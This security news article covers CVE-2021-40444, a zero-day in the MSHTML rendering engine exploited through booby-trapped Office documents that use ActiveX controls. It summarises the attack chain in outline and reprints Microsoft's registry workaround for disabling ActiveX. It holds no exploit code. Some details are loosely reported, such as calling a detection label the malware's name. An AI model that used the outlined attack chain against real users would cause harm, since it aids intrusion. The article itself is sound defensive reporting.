Microsoft reported an actively exploited Zero-Day Vulnerability affecting their Internet Explorer that will enable attackers for remote code execution in user’s systems.
The flaw is found in the MSHTML, the browser rendering engine that is utilized by the Microsoft Internet Explorer Web browser for reading and displaying HTML web pages from Word, Excel, and PowerPoint documents.
The attackers targeting the Microsoft Office users that are using Office 365 and Office 2019 on Windows 10 and many Windows Server versions. The vulnerability is still actively running wild and there is no security patch update for this bug as of now(at the time of reporting this article), but Microsoft has released the recommendations to mitigate this risk.
This zero-day vulnerability in Microsoft product is tracked and designated as CVE-2021-40444 with a high severity CVSS score rating of 8.8.
A Zero-Day Attack is a software security vulnerability that is found in the devices but doesn’t have a patch or is yet to be released to fix the bug. The defect is known by the software vendor and should be focused on its mitigation.
Until then, the cyber attackers can utilize the security loophole to exploit and alter the programs, access data, steal credentials, etc.
How Attacker can Exploit the Zero-Day Bug in Internet Explorer:
Exploitation can be done on the IE browser when an attacker crafts embedded malicious ActiveX controls in a Microsoft Office document. By doing this, the controls will authorize the execution of arbitrary code if the victim opens the malicious .DOCX file and it will load the Internet Explorer engine to render a remote web page sent from the attacker.
The attacker executing the vulnerability by using malware called ‘Suspicious Cpl File Execution’ and the specific ActiveX control will release the malware onto the victim’s system. The victim is more likely to be affected if they operate with high privilege administrative accounts as attackers can compromise the full system.
Generally, Microsoft Office warns the users if the documents received over the Internet may contain viruses and advise them to stay in Protected View through Application Firewall to prevent such attacks. But, most of the time users often tricked and enable editing button without thinking for a while, thus disarming Microsoft security implementations.
Must Read | Apple releases Security Patch for Zero-Day Vulnerability in iOS 14.7.1, iPadOS 14.7.1, and macOS 11.5.1
Microsoft Credited to EXPMON and Mandiant for Reporting the Vulnerability:
Multinational Technology Corporation, Microsoft acknowledged the cyber security researchers from EXPMON and Mandiant cybersecurity companies in their security advisory report who detected and reported the zero-day vulnerability in their products.
In a tweet, EXPMON explains the vulnerability as a “highly sophisticated zero-day attack” after finding that the attack mechanism is 100% reliable and dangerous. They added the attackers targetting Microsoft Office users and the attack was successfully tested on the latest Office 2019 / Office 365 on Windows 10.
Microsoft Released Official Security Update Report on CVE 2021 40444:
Tech giant, Microsoft released a security update guide as – “Microsoft MSHTML Remote Code Execution Vulnerability” assigning CNA as CVE-2021-40444 on its official website.
Microsoft explained the vulnerability in their report but did not reveal additional information about the nature of the zero-day attack, the antagonist behind this exploitation, or their targets in view of real world attacks.
Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
Microsoft spokesperson
There is no official security patch for the bug, but Microsoft recommended to follow the mitigations and temporary workaround steps mentioned in the report to protect the system from this zero-day vulnerability.
Microsoft also added that the vulnerability is still under investigation and soon they will release an official security patch fix update for the flaw. Cyber security experts expect that Microsoft will release on September 14, as they announced to release its monthly “Patch Tuesday” bundle of security updates on the same day.
Here is the Microsoft official security advisory report on zero-day vulnerability- Security Update Guide – Microsoft MSHTML Remote Code Execution Vulnerability
Mitigations Steps Advised by Microsoft for Zero-Day flaw in their Products:
In its security update report on MSHTML Remote Code Execution Vulnerability, Microsoft Corporation recommended mitigation and workaround steps to overcome the risk from this bug.
The mitigation suggested that the documents from the internet should open in the Microsoft Office with Protected View enable or from Application Guard for Office that restricts the current attack.
They also added that their security applications Microsoft Defender Antivirus and Microsoft Defender both provide detection and protection against this attack. Users should keep anti-malware products up to date and no further additional action needs to be taken.
Workaround Suggested by Microsoft for CVE-2021-40444 Zero-Day Attack:
Until the official security patch is released, Microsoft advised to disable the installation of all ActiveX controls in the Internet Explorer browser to mitigate the risk and that can be done by adding a few keys to the windows system registry.
They have given the below detailed instructions to disable the ActiveX control in its security advisory report.
To disable ActiveX controls on an individual system:
- To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the .reg file extension:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
“1001”=dword:00000003
“1004”=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
“1001”=dword:00000003
“1004”=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
“1001”=dword:00000003
“1004”=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
“1001”=dword:00000003
“1004”=dword:00000003
- Double-click the .reg file to apply it to your Policy hive.
- Reboot the system to ensure the new configuration is applied.
Found this article interesting? Follow DefenseLead on Twitter, Facebook and LinkedIn to read more exclusive content.